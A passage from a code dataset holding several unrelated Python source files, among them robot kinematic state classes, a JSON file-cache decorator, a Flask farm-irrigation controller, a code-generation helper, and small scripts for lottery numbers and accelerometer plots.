[x.__getstate__() for x in self._legs]\n return state\n\n def __setstate__(self, state: Dict[str, Any]) -> None:\n legs: List[Dict[str, Any]] = state.pop(\"legs\")\n state[\"legs\"] = [LegState.from_dict(x) for x in legs]\n return super().__setstate__(state)\n\n def distance(self, other: \"LegStates\") -> float:\n super().distance(other)\n ret = 0.0\n for i, v in enumerate(self._legs):\n ret += v.distance(other._legs[i])\n return ret / len(self._legs)\n\n\nclass RobotState(BaseState):\n \"\"\"\n Overall kinematic state data storage for the robot.\n \"\"\"\n\n __slots__ = (\n \"_x\",\n \"_y\",\n \"_z\",\n \"_roll\",\n \"_pitch\",\n \"_yaw\",\n \"_leg_states\",\n \"_body\",\n )\n\n def __init__(\n self,\n x: float,\n y: float,\n z: float,\n roll: float,\n pitch: float,\n yaw: float,\n legs: Sequence[LegState],\n *,\n body_params: Optional[BodyParameters] = None,\n **kwargs: Any,\n ) -> None:\n if body_params is None:\n self._body = BodyParameters(**kwargs)\n else:\n self._body = body_params\n super().__init__(**kwargs)\n self._x = x\n self._y = y\n self._z = z\n self._roll = roll\n self._pitch = pitch\n self._yaw = yaw\n self._leg_states = LegStates(*legs)\n\n @property\n def x(self) -> float:\n \"\"\"float: The current X-coordinate of the body.\"\"\"\n return self._x\n\n @property\n def y(self) -> float:\n \"\"\"float: The current Y-coordinate of the body.\"\"\"\n return self._y\n\n @property\n def z(self) -> float:\n \"\"\"float: The current Z-coordinate of the body.\"\"\"\n return self._z\n\n @property\n def roll(self) -> float:\n \"\"\"float: The current Roll-angle of the body.\"\"\"\n return self._roll\n\n @property\n def pitch(self) -> float:\n \"\"\"float: The current Pitch-angle of the body.\"\"\"\n return self._pitch\n\n @property\n def yaw(self) -> float:\n \"\"\"float: The current Yaw-angle of the body.\"\"\"\n return self._yaw\n\n @property\n def legs(self) -> LegStates[LegState]:\n \"\"\"LegStates[LegState]: The state of each leg.\"\"\"\n return self._leg_states\n\n @property\n def body(self) -> BodyParameters:\n \"\"\"BodyParameters: The related body parameters for this state.\"\"\"\n return self._body\n\n def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n s_args, s_kws = super().__str_args__()\n s_kws[\"x\"] = self._x\n s_kws[\"y\"] = self._y\n s_kws[\"z\"] = self._z\n s_kws[\"roll\"] = self._roll\n s_kws[\"pitch\"] = self._pitch\n s_kws[\"yaw\"] = self._yaw\n return s_args, s_kws\n\n def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n r_args, r_kws = super().__repr_args__()\n r_args.append(self._x)\n r_args.append(self._y)\n r_args.append(self._z)\n r_args.append(self._roll)\n r_args.append(self._pitch)\n r_args.append(self._yaw)\n r_args.append(tuple(self._leg_states))\n return r_args, r_kws\n\n def __getstate__(self) -> Dict[str, Any]:\n state = super().__getstate__()\n state[\"legs\"] = self._leg_states.__getstate__()\n state[\"body\"] = self._body.__getstate__()\n return state\n\n def __setstate__(self, state: Dict[str, Any]) -> None:\n state[\"legs\"] = LegStates.from_dict(state.pop(\"legs\"))\n state[\"body\"] = BodyParameters.from_dict(state.pop(\"body\"))\n return super().__setstate__(state)\n\n def distance(self, other: \"RobotState\") -> float:\n super().distance(other)\n return (\n ((self._x - other._x) ** 2)\n + ((self._y - other._y) ** 2)\n + ((self._z - other._z) ** 2)\n + ((self._roll - other._roll) ** 2)\n + ((self._pitch - other._pitch) ** 2)\n + ((self._yaw - other._yaw) ** 2)\n ) ** 0.5\n\n def pos_distance(self, other: \"RobotState\") -> float:\n \"\"\"The distance between the positions of two states.\"\"\"\n super().distance(other)\n return (\n ((self._x - other._x) ** 2)\n + ((self._y - other._y) ** 2)\n + ((self._z - other._z) ** 2)\n ) ** 0.5\n\n def orn_distance(self, other: \"RobotState\") -> float:\n \"\"\"The distance between the orientations of two states.\"\"\"\n super().distance(other)\n return (\n ((self._roll - other._roll) ** 2)\n + ((self._pitch - other._pitch) ** 2)\n + ((self._yaw - other._yaw) ** 2)\n ) ** 0.5\n","repo_name":"douglasdaly/squad-robot","sub_path":"src/squad/motion/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":14415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72258336400","text":"# 函数写法的装饰器\r\ndef persists(file_path:str,option:str,step:int=1,jm=False):\r\n \"\"\"\r\n 文件持久化装饰器,\r\n :param file_path:文件存储路径\r\n :param option:操作 set,getset,get,incr,decr,keys,del\r\n :param step: 步长\r\n :param jm:是否加密\r\n :return: mixed\r\n \"\"\"\r\n def decorator(original_func):\r\n def new_func(param='',value=''):\r\n import json\r\n try:\r\n cache = json.load(open(file_path, 'r'))\r\n except (IOError, ValueError):\r\n cache = {}\r\n #解析得到key\r\n import hashlib\r\n key = str(param)\r\n if(type(param).__name__ == 'int' and jm==True):\r\n key = hashlib.new('md5', str(param*65535).encode('utf-8')).hexdigest()\r\n if(type(param).__name__ == 'str' and jm==True):\r\n key = hashlib.new('md5', ('cache_'+param).encode('utf-8')).hexdigest()\r\n \"\"\"\r\n 根据option选择对应的操作\r\n \"\"\"\r\n if(param =='' and option == 'keys'):\r\n return cache\r\n if(option == 'set'): #直接存储\r\n cache_key = original_func(param,value) #运行得到新值\r\n cache[key] = cache_key #存新值\r\n if(option == 'getset'):#先获取再存\r\n if key in cache:\r\n cache_key = cache[key] #得到旧值\r\n else:\r\n cache_key = None\r\n cache[key] = original_func(param,value) #存新值\r\n if(option == 'get'):#直接如果有就直接拿,不存\r\n if key in cache:\r\n cache_key = cache[key]\r\n else:\r\n cache_key = None\r\n if(option == 'incr'):\r\n if key in cache:\r\n cache_key = cache[key]+step\r\n else:\r\n cache_key = step\r\n cache[key] = cache_key # 存新值\r\n if(option == 'decr'):\r\n if key in cache:\r\n cache_key = cache[key]-step\r\n else:\r\n cache_key = -step\r\n cache[key] = cache_key # 存新值\r\n\r\n if(option == 'del'):\r\n if key in cache:\r\n cache_key = cache[key]\r\n del cache[key]\r\n else:\r\n cache_key = None\r\n with open(file_path, 'w') as f:\r\n json.dump(cache, f, indent=4)\r\n return cache_key\r\n return new_func\r\n return decorator\r\n\r\n#类写法的装饰器\r\nimport json\r\nimport random\r\nfrom functools import partial\r\nfile = \"cache.file\"\r\nclass inner(object):\r\n def __init__(self, persist, callfunc):\r\n self.persist = persist\r\n self.callfunc = callfunc\r\n\r\n def __read(self):\r\n try:\r\n return json.load(open(self.persist.file_path, 'r'))\r\n except (IOError, ValueError):\r\n return {}\r\n\r\n def __write(self, cache):\r\n with open(file, \"w\") as f:\r\n json.dump(cache, f, indent=4)\r\n\r\n def set(self, cache, params):\r\n cache_key = self.callfunc(params) # 运行得到新值\r\n cache[params] = cache_key\r\n return cache_key\r\n\r\n def get(self, cache, params):\r\n return cache.get(params)\r\n\r\n def getset(self, cache, params):\r\n cache[params] = self.callfunc(params)\r\n return cache.get(params)\r\n\r\n def incr(self, cache, params):\r\n cache_key = cache.get(params, 0) + self.persist.step\r\n cache[params] = cache_key # 存新值\r\n return cache_key\r\n\r\n def decr(self, cache, params):\r\n cache_key = cache.get(params, 0) - self.persist.step\r\n cache[params] = cache_key # 存新值\r\n return cache_key\r\n\r\n def default(self, cache, params):\r\n return self.callfunc(params)\r\n\r\n def __call__(self, params):\r\n cache = self.__read()\r\n if hasattr(self, self.persist.option):\r\n result = partial(getattr(self, self.persist.option), cache)(params)\r\n else:\r\n result = partial(self.default, cache)(params)\r\n self.__write(cache)\r\n return result\r\n\r\nclass persist(object):\r\n def __init__(self, file_path, option, step=1):\r\n self.file_path = file_path\r\n self.option = option\r\n self.step = step\r\n\r\n def __call__(self, func):\r\n return inner(self, func)\r\n\r\n\r\n@persist(file, 'get')\r\ndef test(key):\r\n return 'get'\r\n@persist(file, 'getset')\r\ndef test1(key):\r\n return 'getset'\r\n@persist(file, 'incr', 5)\r\ndef test2(key):\r\n return 10\r\n@persist(file, 'set')\r\ndef test3(key):\r\n return {'a': 1, 'b': 2}\r\n@persist(file, 'getset')\r\ndef test4(key):\r\n r = [1, 2, 3, 4, 5, 5, key]\r\n random.shuffle(r)\r\n return r\r\n@persist(file, 'decr', 11)\r\ndef test5(key):\r\n return -10\r\n","repo_name":"Euraxluo/ProjectPractice","sub_path":"python/Mytodolist/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37907854558","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis is a layer that links to another layer\n\"\"\"\nfrom smartimage.layer import *\nfrom smartimage.errors import SmartimageError\n\n\nclass Link(Layer):\n \"\"\"\n This is a layer that links to another layer\n \"\"\"\n\n def __init__(self,parent:Layer,xml:str):\n self._target=None\n Layer.__init__(self,parent,xml)\n\n @property\n def ref(self)->str:\n \"\"\"\n get the reference\n \"\"\"\n return self.xml.attrib['ref']\n @ref.setter\n def ref(self,ref):\n \"\"\"\n set the reference\n \"\"\"\n self.xml.attrib['ref']=ref\n self.root.dirty=True\n\n def _getProperty(self,name:str,default=None):\n \"\"\"\n override _getProperty so that when somebody uses this object\n they get the property of the one it is linked to instead\n \"\"\"\n val=default\n if name in self.xml.attrib:\n val=self.xml.attrib[name]\n elif name not in ['name','elementId']: # can't be unique to this object\n val=self.target._getProperty(name,default)\n return val\n\n @property\n def target(self)->Layer:\n \"\"\"\n the target to link to\n \"\"\"\n if self._target is None:\n layerId=self.ref.split('.',1)[0]\n self._target=self.getLayer(layerId)\n if self._target is None:\n raise SmartimageError(self,'ERR: broken link to layer %s'%layerId)\n return self._target\n\n @property\n def image(self)->Union[PilPlusImage,None]:\n \"\"\"\n get the image for this layer\n \"\"\"\n img=self.target.image\n\n w=self._getProperty('w','auto')\n h=self._getProperty('h','auto')\n if (w not in ['0','auto']) and (h not in ['0','auto']):\n if w in ['0','auto']:\n w=img.width*(img.height/h)\n elif h in ['0','auto']:\n h=img.height*(img.width/w)\n img=img.resize((int(w),int(h)),img.ANTIALIAS)\n img.immutable=True # mark this image so that compositor will not alter it\n return img","repo_name":"TheHeadlessSourceMan/smartimage","sub_path":"link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"6751211930","text":"import numpy as np\nimport pandas as pd\nimport pandas as pd\nimport matplotlib.pylab as plt\n\n\ndef main():\n accelerometerDataFile = \"accelerometer_data_5min.csv\"\n readAccelerometerData = pd.read_csv(accelerometerDataFile, sep=\";\")\n x = readAccelerometerData.values[:, 1][1:]\n y = readAccelerometerData.values[:, 2][1:]\n z = readAccelerometerData.values[:, 3][1:]\n time = readAccelerometerData.values[:, 0][1:]\n start = time[0]\n end = time[len(time) - 1]\n size = int((end-start)/1000) + 1\n step = size/len(x)\n seconds = [i for i in np.arange(1, size + 1, step)]\n\n fig, (ax0, ax1, ax2) = plt.subplots(3, 1)\n\n ax0.plot(seconds, x, 'b', linewidth=0.5)\n ax0.legend(\"x\")\n ax0.set_title(\"Показания акселерометра смартфона, \\n лежащего на столе в течение пяти минут\")\n\n ax1.plot(seconds, y, 'g', linewidth=0.5)\n ax1.legend(\"y\")\n ax1.set_ylabel(\"Ускорение\", fontsize=12)\n\n ax2.plot(seconds, z, 'r', linewidth=0.5)\n ax2.legend(\"z\")\n\n plt.xlabel('Секунды', fontsize=12)\n plt.show()\n\n print(sum([np.sqrt(x[i]**2 + y[i]**2 + z[i]**2) for i in range(len(x))])/len(x))\n\n\n\nmain()","repo_name":"fotievaRi/Diplom","sub_path":"AccelerometerData_5min.py","file_name":"AccelerometerData_5min.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43798793153","text":"# 31256 KB / 40 ms\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nm = int(input())\nrec = list(map(int, input().split()))\nvote = {} # ���진이 걸린 학생의 번호: 투표수\nseq = [] # 사진이 걸린 순서\n\nfor i in range(m):\n # 사진이 걸린 학생이면 그냥 +1\n if rec[i] in vote:\n vote[rec[i]] += 1\n\n # 사진이 안걸린 학생인 경우\n else:\n # 사진틀이 다 찼으면 투표수가 가장 적은 학생 제거\n if len(vote) == n:\n min_vote = min(vote.values())\n for j in range(len(seq)):\n if vote[seq[j]] == min_vote:\n vote.pop(seq[j])\n seq.pop(j)\n break\n # 제거 후 새로운 학생 게시\n vote[rec[i]] = 1\n seq.append(rec[i])\n\nprint(*sorted(vote.keys()))","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week14_230413/1713_후보_추천하기/1713_최수현.py","file_name":"1713_최수현.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18949240359","text":"from flask import Flask, request\nfrom flask import render_template, json\nfrom flask_cors import CORS\nfrom decisionController import DecisionController\nfrom UserInterface import UserInterface\nfrom controller import dripController\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef hello():\n return render_template('index.html')\n\n@app.route('/getActuatorStatus', methods=['POST'])\ndef getActuatorStatus():\n data = request.json\n d = DecisionController('start')\n d.setBufferData(data)\n res = d.compareConfigurationValues()\n print(res)\n return res\n\n@app.route('/getFarmConfiguration', methods=['GET'])\ndef getFarmConfiguration():\n return u.getFarmConfigurationValues()\n\n@app.route('/saveFarmConfigurationDetails', methods=['POST'])\ndef saveFarmConfigurationDetails():\n data = request.json\n return u.setFarmData(data)\n\n@app.route('/farmConfiguration')\ndef farmConfiguration():\n return render_template('farm_config.html')\n\ndef chunker_list(seq, size):\n return (seq[i::size] for i in range(size))\n\n@app.route('/getSensorValues', methods=['GET'])\ndef getSensorValues():\n res = []\n cntr = request.args.get('cntr')\n reset =request.args.get('isReset')\n print(reset)\n for i in range(0, len(controllers)):\n res.append(\n { 'val': controllers[i].readSensorValue(int(cntr), reset) }\n )\n print(list(chunker_list(res, 4)))\n res = list(chunker_list(res, 4))\n return json.dumps(res)\nif __name__ == '__main__':\n u = UserInterface()\n controllers = []\n for i in range(1, 9):\n controllers.append(dripController(i))\n app.run(debug=True, port=80, host='0.0.0.0')","repo_name":"pshubham95/SD-Final-Project","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15957021394","text":"import random\nfrom collections import Counter\n\ntot = []\n# tot2 = []\n\n# pop()이 너무 느려서 그냥 random으로 뽑음...\nfor x in range(8140000):\n# for x in range(1000):\n# for x in range(2) :\n num = []\n rotto_no = random.randint(1,45)\n for si in range(6):\n # for i in range(7):\n while rotto_no in num:\n rotto_no = random.randint(1,45)\n num.append(rotto_no)\n # if i == 6 :\n # tot2.append(rotto_no)\n # else :\n # tot.append(rotto_no)\n tot.append(rotto_no)\n #print(sorted(num))\n #print(tot)\ntotCnt = Counter(tot)\n# tot2Cnt = Counter(tot2)\n# print(totCnt)\n\n# totVal = sorted(totCnt.most_common(7))\ntotVal = sorted(totCnt.most_common(6))\n# print(totVal)\n# tot2Val = (tot2Cnt.most_common(1))\n# print(tot2Val)\n# print(sorted(totVal))\n# print(totVal)\n\nreturnVal = []\n\nfor ret in range(6) :\n returnVal.append(str(totVal[ret])[1:str(totVal[ret]).find(',')])\n\nf = open('./roResult.txt', 'r')\n\nresultList = []\n\nwhile True:\n line = f.readline()\n if len(line) > 0 : resultList.append(line[0:line.find('+')])\n if not line: break\n\nf.close()\n\nuseFlag = True\nfor re in range(len(resultList)):\n # print(','.join(returnVal))\n # print(resultList[re])\n if ','.join(returnVal) == resultList[re] : \n useFlag = False \n useNum = re+1\n\nif useFlag == False : print(str(useNum) +' 회 당첨 내역 입니다.')\nelse : print(str(returnVal) + ' 번호는 기존 당첨 내역에 없습니다.')\n\n\n# print(returnVal)\n# print(sorted(returnVal))","repo_name":"noname23Dean/pyDean","sub_path":"01randomNum.py","file_name":"01randomNum.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74035438480","text":"import csv\r\nimport os \r\n\r\ntabela_periodica = {}\r\nestados = {'l': 'Líquido', 'g': 'Gasoso', 's':'Sólido', 'd':'Desconhecido'} ## exemplo de dicionario\r\n\r\ndef limparTela():\r\n os.system('cls')\r\n\r\narquivo = csv.reader(open('tabela.csv'), delimiter=';')\r\nfor i,dado_linha in enumerate(arquivo):\r\n if i == 0: # pula primeira linha do arquivo\r\n continue\r\n\r\n dados = {}\r\n dados['simbolo'] = dado_linha[0] # simbolo\r\n dados['nome'] = dado_linha[1] # nome\r\n dados['atomico'] = dado_linha[2] # n° atômico\r\n dados['linha'] = dado_linha[3] # linha\r\n dados['coluna'] = dado_linha[4] # coluna\r\n dados['estado'] = dado_linha[5] # estado\r\n\r\n \r\n # insere os dados na tabela periodica\r\n tabela_periodica[dados['simbolo']] = dados\r\n\r\nwhile True:\r\n print(\"Tabela Periódica\\n\")\r\n print(\"Escolha uma das opções:\")\r\n print(\"1 -> Dados existentes\")\r\n print(\"2 -> Características existentes\")\r\n print(\"3 -> Características do elemento\")\r\n print(\"4 -> Sair\")\r\n\r\n option = str(input())\r\n limparTela()\r\n\r\n if option == '1':\r\n \r\n print(\"\\nElementos existentes no banco de dados:\")\r\n for name in tabela_periodica.keys():\r\n print(\"-> \"+ name)\r\n print()\r\n \r\n elif option == '2':\r\n print(\"\\nCaracterísticas existentes no banco de dados:\")\r\n for name in tabela_periodica['Ti'].keys():\r\n print(\"-> \"+name)\r\n print()\r\n\r\n elif option == '3':\r\n \r\n elemento = input('\\nInsira o símbolo do elemento para ver suas caracteristicas: ')\r\n if elemento in tabela_periodica:\r\n carac = input(\"\\nInsira qual característica deseja ver: \")\r\n while carac not in tabela_periodica[elemento]:\r\n print(\"Caracteristica \" + carac + \" não encontrado no banco de dados\")\r\n carac = input(\"\\nInsira qual característica deseja ver: \")\r\n print()\r\n print(tabela_periodica[elemento][carac])\r\n print()\r\n else:\r\n print(\"Elemento \" + elemento + \" não encontrado no banco de dados\")\r\n\r\n elif option == '4':\r\n break\r\n\r\n","repo_name":"gabrielvanz/CC-Estrutura-de-Dados","sub_path":"Atividade 1 - Usando a estrutura de dados dicionário/dicionario.py","file_name":"dicionario.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8759025242","text":"import enum\nimport re\nfrom typing import Optional\n\nfrom github.ContentFile import ContentFile\nfrom packaging.specifiers import SpecifierSet\n\nPYTHON_REQUIRES_PATTERN = re.compile(\n r\"python_requires\\s*=\\s*(\\(?(\\s*['\\\"].+?['\\\"]\\s*)+\\)?)\", re.DOTALL\n)\n\n\nclass PyVersion(enum.Enum):\n PY2 = \"PY2\"\n PY3 = \"PY3\"\n PY2PY3 = \"PY2PY3\"\n\n\nDEFAULT_PY_VERSION = PyVersion.PY2\n\n\ndef get_python_requires_str(setup_content: str) -> Optional[str]:\n try:\n output = PYTHON_REQUIRES_PATTERN.search(setup_content).group(1)\n python_requires = re.sub(r\"[()\\s'\\\"]\", \"\", output)\n except AttributeError:\n python_requires = None\n return python_requires\n\n\ndef get_package_python_version(setup_content: str) -> PyVersion:\n python_requires = get_python_requires_str(setup_content)\n if not python_requires:\n return DEFAULT_PY_VERSION\n\n py2_set = {\"2.7\"}\n py3_set = {\"3.7\", \"3.8\", \"3.9\", \"3.10\"}\n specifier = SpecifierSet(python_requires)\n is_py2 = set(specifier.filter(py2_set))\n is_py3 = set(specifier.filter(py3_set))\n\n if is_py2 and is_py3:\n return PyVersion.PY2PY3\n elif is_py2:\n return PyVersion.PY2\n elif is_py3:\n return PyVersion.PY3\n else:\n return DEFAULT_PY_VERSION\n\n\ndef get_str_from_git_content(content: \"ContentFile\") -> str:\n return content.decoded_content.decode(\"utf-8\")\n","repo_name":"QualiSystems/Shell-Explorer","sub_path":"scripts/shell_explorer/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74362525841","text":"def calPoint(ops) -> int:\n scores = []\n sum = 0\n\n log(\"0) initilize\")\n\n for idx, x in enumerate(ops):\n\n x = x.upper().strip()\n score_count = len(scores)\n\n flagSkip = True\n\n if int_tryparse(x): # x.isdigit():\n flagSkip = False\n scores.append(int(x))\n log(f\"{idx+1}) add {x} .. {scores}\")\n elif x == '+':\n if score_count >= 2:\n flagSkip = False\n sum = int(scores[-1])+int(scores[-2])\n scores.append(sum)\n\n log(f\"{idx+1}) add sum of last 2 scores .. {scores}\")\n elif x == 'D':\n if score_count >= 1:\n flagSkip = False\n sum = int(scores[-1]) * 2\n scores.append(sum)\n log(f\"{idx+1}) add double of last score .. {scores}\")\n elif x == 'C':\n if score_count >= 1:\n flagSkip = False\n scores.pop(score_count-1)\n log(f\"{idx+1}) remove last score .. {scores}\")\n else:\n pass\n\n if flagSkip:\n log(f\"{idx+1}) ignore and skip for '{x}'\")\n sum = 0\n for x in scores:\n sum += int(x)\n\n log(f\"\\nraw score is {ops}\", True)\n log(f\"total score of {scores} is {sum}\", True)\n\n return sum\n\n\ndef int_tryparse(value):\n ret = False\n try:\n i = int(value)\n ret = True\n except:\n i = -1\n\n return ret\n\n\ndef log(msg, debugMode=True):\n if debugMode:\n print(msg)\n\n\nif __name__ == \"__main__\":\n line = \"+ 5 -2 4 zz c d 9 + +\"\n ops = line.strip().split()\n calPoint(ops)\n # print(calPoint(ops))\n","repo_name":"ssuwijak/python_turing_exam","sub_path":"turing_exam1.py","file_name":"turing_exam1.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30116907008","text":"import logging\nfrom typing import List, TypeVar, Generic\nfrom app.core.util import Comparable\nfrom . import Trigger\nfrom app.core.event_engine.events import Event\nfrom app.core.event_engine.triggers import Trigger, ValueTriggerSchema\nfrom app.core.event_engine.actions import Action\n\nfrom marshmallow import post_load\n\n#######################\n# Schemas\n#######################\nclass GreaterThanTriggerSchema(ValueTriggerSchema):\n\t@post_load\n\tdef make(self, data, **kwargs):\n\t\treturn GreaterThanTrigger(**data)\n#######################\n\nT = TypeVar('T', bound=Comparable)\nclass GreaterThanTrigger(Trigger, Generic[T]):\n\t__schema__ = GreaterThanTriggerSchema\n\n\t\"\"\"Executes if value is greater than trigger value\"\"\"\n\tdef __init__(self, value: T, actions: List[Action] = [], *, field: str | None = None) -> None:\n\t\t\"\"\"\n\t\tArgs:\n\t\t\t\tvalue (T): Value to test against\n\t\t\t\tactions (List[Action], optional): Actions to execute on success. Defaults to [].\n\t\t\t\tfield (str | None, optional): Field to use when testing trigger value. Defaults to None.\n\t\t\"\"\"\n\t\tsuper().__init__(actions, field)\n\t\tself.value = value\n\n\tdef execute(self, v: T | dict, event: Event) -> bool:\n\t\tlogging.info('Executing greater than trigger')\n\t\tvalue: T = self.get_value(v)\n\n\t\tif not value > self.value :\n\t\t\tlogging.info(f'{value} < {self.value}, not executing actions')\n\t\t\treturn False\n\n\t\tlogging.info(f'{value} > {self.value}, executing actions')\n\t\tself.execute_actions(event)\n\n\t\treturn True\n","repo_name":"Flourish-IoT/Flourish-API","sub_path":"src/app/core/event_engine/triggers/greater_than.py","file_name":"greater_than.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20565922201","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom enum import Enum\nfrom io import StringIO\nfrom delia_commons.singleton import Singleton\n\nlogger = logging.getLogger('delia.codegen')\n\n\nclass AutoNumber(Enum):\n def __new__(cls):\n value = len(cls.__members__) + 1\n obj = object.__new__(cls)\n obj._value_ = value\n return obj\n\n\nclass CodeBlockNames(AutoNumber):\n ROOT = ()\n HEADER = ()\n NS = ()\n BODY = ()\n WRAPPING = ()\n\n RECEIVING_PARAMS_VALIDITY = ()\n\n METADATA = ()\n\n LITERAL = ()\n LOCAL = ()\n CONSTANT = ()\n CONSTANT_NS = ()\n\n ARRAY = ()\n FIELD = ()\n DATA_DESC = ()\n\n REPORT_DECLARATION = ()\n REPORT_INSTANCE = ()\n\n CONTROL = ()\n\n FRAME = ()\n RELATION = ()\n SOURCE = ()\n\n FLI = ()\n FUNCTION = ()\n FUNCTION_NS = ()\n FUNCTION_KEYS = ()\n FUNCTION_KEYS_DICT = ()\n\n RELATION_LOCAL = ()\n INSERT = ()\n ALTER = ()\n DELETE = ()\n DELETE_VIA_KEY = ()\n SELECT = ()\n SELECT_JOIN = ()\n SELECT_VIA_KEY = ()\n FOR_EACH = ()\n FOR_EACH_JOIN = ()\n\n\nclass Token(Singleton):\n pass\n\n\nclass Indent(Token):\n pass\n\n\nclass Dedent(Token):\n pass\n\n\nclass Newline:\n def __init__(self, locations):\n self.locations = locations\n\n\nclass Locations(Token):\n locations = None\n\n def set_locations(self, locations):\n self.locations = locations\n\n def __repr__(self):\n return str(self.locations)\n\n\nclass CodeBlock:\n\n def __init__(self, tab=4 * \" \"):\n self.code = []\n self.tab = tab\n self._gen_location = True\n\n def stop_gen_locations(self):\n self._gen_location = False\n\n def start_gen_locations(self):\n self._gen_location = True\n Locations().locations = None\n\n def newline(self, string=\"\", no_locations=False):\n if no_locations or not self._gen_location or string.lstrip().startswith('#'):\n locations = None\n else:\n locations = Locations().locations\n\n self.code.append(Newline(locations))\n self.code.append(string)\n\n def write(self, string):\n self.code += string\n\n def indent(self):\n self.code.append(Indent())\n\n def dedent(self):\n self.code.append(Dedent())\n\n def add(self, cb):\n self.code.append(cb)\n\n def set_locations(self, locations):\n pass\n\n def flatten(self, level=0, buffer=None, newline=False):\n if buffer is None:\n buffer = StringIO()\n\n for line in self.code:\n\n if isinstance(line, Newline):\n buffer.write(\"\\n\")\n newline = True\n\n elif isinstance(line, Indent):\n level += 1\n\n elif isinstance(line, Dedent):\n level -= 1\n\n elif isinstance(line, str):\n if line != '':\n if newline:\n buffer.write(level * self.tab + line)\n newline = False\n else:\n buffer.write(line)\n\n elif isinstance(line, CodeBlock):\n line.flatten(level, buffer, newline)\n\n return buffer.getvalue()\n\n def eq_locations(self, loc1, loc2):\n return loc1[0] == loc2[0] and loc1[2] == loc2[2]\n\n def gen_mapping(self, mapper, pylineno=1, last_locations=None):\n for line in self.code:\n if isinstance(line, Newline):\n pylineno += 1\n if line.locations and (last_locations is None or not self.eq_locations(last_locations, line.locations)):\n mapper.add(line.locations, pylineno)\n last_locations = line.locations\n elif isinstance(line, CodeBlock):\n pylineno = line.gen_mapping(mapper, pylineno, last_locations)\n return pylineno\n\n def isEmpty(self):\n return True if self.code == [] else False\n\n\nif __name__ == \"__main__\":\n\n cb = CodeBlock(tab=\"°\")\n cb2 = CodeBlock(tab=\"°\")\n\n cb.newline(\"def toto():\")\n cb.indent()\n cb.add(cb2)\n cb.dedent()\n\n cb2.newline(\"C1 = 0\")\n cb2.newline(\"C2 = 1\")\n cb2.newline()\n cb2.write(\"C3 = \")\n cb2.write(\"2\")\n cb2.newline()\n cb2.write(\"def hello():\")\n cb2.indent()\n cb2.newline(\"pass\")\n cb2.dedent()\n\n print(cb.flatten())\n","repo_name":"azizlahmedi/iadev3.0","sub_path":"venv/lib/python3.11/site-packages/delia_codegen/codeblock.py","file_name":"codeblock.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29522457356","text":"from lordoftheringssdk.api_methods import ApiMethods\n\nclass Quote(ApiMethods):\n \"\"\"Class representing a quote from a Lord of the Rings movie\"\"\"\n\n def __init__(\n self, _id: str, dialog: str, movie_id: str, character_id: str, id: str\n ):\n \"\"\"\n Initializes a Quote object with relevant attributes\n\n :param _id: quote's unique identifier\n :param dialog: the contents of the quote\n :param movie_id: identifier for the movie the quote is from\n :param character_id: identifier for which character says the quote\n :param id: redundant quote identifier\n \"\"\"\n self._id = _id\n self.dialog = dialog\n self._movie_id = movie_id\n self._character_id = character_id\n self.id = id\n self.name = dialog\n\n @property\n def movie(self):\n from .movie import Movie\n return Movie.get(self._movie_id)[0]\n","repo_name":"Dbuffet/LORD-SDK","sub_path":"lordoftheringssdk/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18332695051","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\nalp_to_num = {chr(i+97): i for i in range(26)}\nALP_to_num = {chr(i+97).upper(): i for i in range(26)}\nnum_to_alp = {i: chr(i+97) for i in range(26)}\nnum_to_ALP = {i: chr(i+97).upper() for i in range(26)}\n\ndef make_grid(h, w, num): return [[int(num)] * w for _ in range(h)]\n\n\ndef main():\n Q = NI()\n querys = [list(SI().split()) for _ in range(Q)]\n D = deque()\n for q in querys:\n if q[0] == \"1\":\n D.append([q[1], int(q[2])])\n continue\n\n cut = [0]*26\n d = int(q[1])\n while d > 0 and D:\n L = D.popleft()\n if d >= L[1]:\n cut[alp_to_num[L[0]]] += L[1]\n d -= L[1]\n else:\n cut[alp_to_num[L[0]]] += d\n D.appendleft([L[0], 